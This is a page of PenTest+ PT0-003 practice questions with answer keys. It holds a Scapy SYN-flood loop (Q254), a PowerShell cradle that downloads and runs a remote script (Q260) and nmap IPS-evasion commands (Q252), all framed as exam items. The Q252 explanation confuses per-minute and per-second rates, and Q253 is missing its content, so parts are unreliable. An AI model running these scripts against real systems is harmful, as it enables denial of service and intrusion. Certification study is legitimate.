CompTIA PT0-003 Online Practice Questions and Exam Preparation

CompTIA PT0-003 Online Questions & Answers

• Question 251:

  A compliance-based penetration test is primarily concerned with:

  A. obtaining Pll from the protected network.
  B. bypassing protection on edge devices.
  C. determining the efficacy of a specific set of security standards.
  D. obtaining specific information from the protected network.
  C. determining the efficacy of a specific set of security standards.

  ---

  Explanation

• Question 252:

  A security engineer is trying to bypass a network IPS that isolates the source when the scan exceeds 100 packets per minute. The scope of the scan is to identify web servers in the 10.0.0.0/16 subnet.

  Which of the following commands should the engineer use to achieve the objective in the least amount of time?

  A. nmap -T3 -p 80 10.0.0.0/16 -- max-hostgroup 100
  B. nmap -TO -p 80 10.0.0.0/16
  C. nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60
  D. nmap -T5 -p 80 10.0.0.0/16 -- min-rate 80
  C. nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60

  ---

  Explanation

  The nmap -T4 -p 80 10.0.0.0/16 -- max-rate 60 command is used to scan the 10.0.0.0/16 subnet for web servers (port 80) at a maximum rate of 60 packets per minute. The -T4 option sets the timing template to "aggressive", which speeds up the scan. The -- max-rate option limits the number of packets sent per second, helping to bypass the network IPS that isolates the source when the scan exceeds 100 packets per minute 12.

• Question 253:

  DRAG DROP

  Place each of the following passwords in order of complexity from least complex (1) to most complex (4), based on the character sets represented Each password may be used only once.

  Select and Place:

  

  

• Question 254:

  A penetration tester is authorized to perform a DoS attack against a host on a network.

  Given the following input:

  ip = IP("192.168.50.2")

  tcp = TCP(sport=RandShort(), dport=80, flags="S") raw = RAW(b"X"*1024) p = ip/tcp/raw send(p, loop=1, verbose=0)

  Which of the following attack types is most likely being used in the test?

  A. MDK4
  B. Smurf attack
  C. FragAttack
  D. SYN flood
  D. SYN flood

  ---

  Explanation

  A SYN flood attack exploits the TCP handshake by sending a succession of SYN requests to a target's system. Each request initializes a connection that the target system must acknowledge, thus consuming resources.

  Understanding the Script:

  ip = IP("192.168.50.2"): Sets the destination IP address to 192.168.50.2.

  tcp = TCP(sport=RandShort(), dport=80, flags="S"): Creates a TCP packet with a random source port, destination port 80, and the SYN flag set.

  raw = RAW(b"X"*1024): Adds 1024 bytes of data to the packet. p = ip/tcp/raw: Combines the IP, TCP, and RAW layers into a single packet.

  send(p, loop=1, verbose=0): Sends the packet in an infinite loop without verbose output.

  Purpose of SYN Flood:

  Resource Exhaustion: By sending numerous SYN requests, the target's connection table fills up, preventing legitimate connections.

  Denial of Service: The target system becomes overwhelmed and unable to process further requests, effectively causing a denial of service.

  Detection and Mitigation:

  Rate Limiting: Implement rate limiting on SYN packets.

  SYN Cookies: Use SYN cookies to handle the connection requests without allocating resources immediately.

  Firewalls and IDS: Deploy firewalls and Intrusion Detection Systems (IDS) to detect and mitigate SYN flood attacks.

  References from Pentesting Literature:

  SYN flood attacks are a classic example of a denial-of-service attack and are commonly discussed in penetration testing guides and HTB write-ups for understanding network-based attacks.

  References:

  Penetration Testing - A Hands-on Introduction to Hacking

  HTB Official Writeups

• Question 255:

  During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services.

  Which of the following tools is best for this task?

  A. WiGLE.net
  B. WHOIS
  C. theHarvester
  D. Censys.io
  D. Censys.io

  ---

  Explanation

  Censys.io is a powerful reconnaissance tool that scans the internet and provides detailed information about exposed services, certificates, and GeoIP data.

  Option A (WiGLE.net): Used for wireless network mapping, not host discovery.

  Option B (WHOIS): Provides domain registration information, not GeoIP or service summaries.

  Option C (theHarvester): Used for OSINT, mainly to collect emails, subdomains, and usernames.

  Option D (Censys.io): Correct. Censys provides:

  GeoIP data (location of hosts).

  Exposed services and open ports.

  TLS certificate analysis.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?Reconnaissance and OSINT Tools

• Question 256:

  A penetration tester cannot complete a full vulnerability scan because the client's WAF is blocking communications.

  During which of the following activities should the penetration tester discuss this issue with the client?

  A. Goal reprioritization
  B. Peer review
  C. Client acceptance
  D. Stakeholder alignment
  D. Stakeholder alignment

  ---

  Explanation

  Stakeholder Alignment:

  During stakeholder alignment, the penetration tester and client discuss challenges, constraints, and objectives.

  Addressing WAF interference ensures the scope and goals are adjusted or mitigated to accommodate the issue.

  Why Not Other Options?

  Option A: Goal reprioritization focuses on internal team adjustments, not client collaboration.

  Option B: Peer review evaluates findings and methodologies but doesn't involve clients.

  Option C: Client acceptance occurs post-assessment, not during active engagement.

  References:

  Domain 1.0 (Planning and Scoping)

• Question 257:

  In the process of active service enumeration, a penetration tester identifies an SMTP daemon running on one of the target company's servers.

  Which of the following actions would BEST enable the tester to perform phishing in a later stage of the assessment?

  A. Test for RFC-defined protocol conformance.
  B. Attempt to brute force authentication to the service.
  C. Perform a reverse DNS query and match to the service banner.
  D. Check for an open relay configuration.
  D. Check for an open relay configuration.

  ---

  Explanation

  SMTP is a protocol associated with mail servers. Therefore, for a penetration tester, an open relay configuration can be exploited to launch phishing attacks.

• Question 258:

  A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client's networking team observes a substantial increase in DNS traffic.

  Which of the following would most likely explain the increase in DNS traffic?

  A. Covert data exfiltration
  B. URL spidering
  C. HTML scrapping
  D. DoS attack
  A. Covert data exfiltration

  ---

  Explanation

  An increase in DNS traffic during a penetration test suggests data exfiltration using DNS tunneling, a method where attackers encode data into DNS queries to avoid detection.

  Option A (Covert data exfiltration): Correct. DNS tunneling (e.g., dnscat2, Iodine) is a stealthy method to bypass firewalls and extract sensitive data.

  Option B (URL spidering): Would cause increased web traffic, not DNS requests.

  Option C (HTML scraping): Involves parsing web pages, not DNS traffic.

  Option D (DoS attack): DoS floods bandwidth or servers, but does not increase DNS queries significantly.

  References:

  CompTIA PenTest+ PT0-003 Official Guide ?DNS Tunneling&

  Data Exfiltration

• Question 259:

  A company that uses an insecure corporate wireless network is concerned about security.

  Which of the following is the most likely tool a penetration tester could use to obtain initial access?

  A. Responder
  B. Metasploit
  C. Netcat
  D. Nmap
  A. Responder

  ---

  Explanation

  Given an insecure wireless network (e.g., open or poorly secured Wi-Fi), a practical initial access technique is to capture or poison name resolution/authentication requests from client systems once they are on that network. Responder is designed to perform LLMNR/NBT-NS/MDNS poisoning and capture NTLM authentication attempts and other credential material on a local network segment. On an insecure Wi-Fi network an attacker can either join the network or run a rogue AP and then run Responder to capture credentials from connected clients -- a typical and effective initial-access method in such scenarios.

  Why not the others:

  Option B: Metasploit -- a general exploitation framework; useful after finding a vulnerable service, but not specifically the most-likely initial tool on an insecure Wi-Fi.

  Option C: Netcat -- a raw TCP/UDP utility (listeners/shells); useful post-exploitation but not for capturing broadcast name resolution requests.

  Option D: Nmap -- a scanner to discover hosts/ports; helpful reconnaissance, but not directly used to capture credentials on a local insecure wireless segment.

  CompTIA PT0-003 Mapping: Wireless/host-based attacks and network credential-capture techniques (evil twin/rogue AP and LLMNR/NetBIOS poisoning).

• Question 260:

  Given the following script:

  $1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split("\")[1]

  If ($1 -eq "administrator") {

  echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') |

  powershell - noprofile -}

  Which of the following is the penetration tester most likely trying to do?

  A. Change the system's wallpaper based on the current user's preferences.
  B. Capture the administrator's password and transmit it to a remote server.
  C. Conditionally stage and execute a remote script.
  D. Log the internet browsing history for a systems administrator.
  C. Conditionally stage and execute a remote script.

  ---

  Explanation

  References:

  Penetration Testing - A Hands-on Introduction to Hacking HTB Official Writeups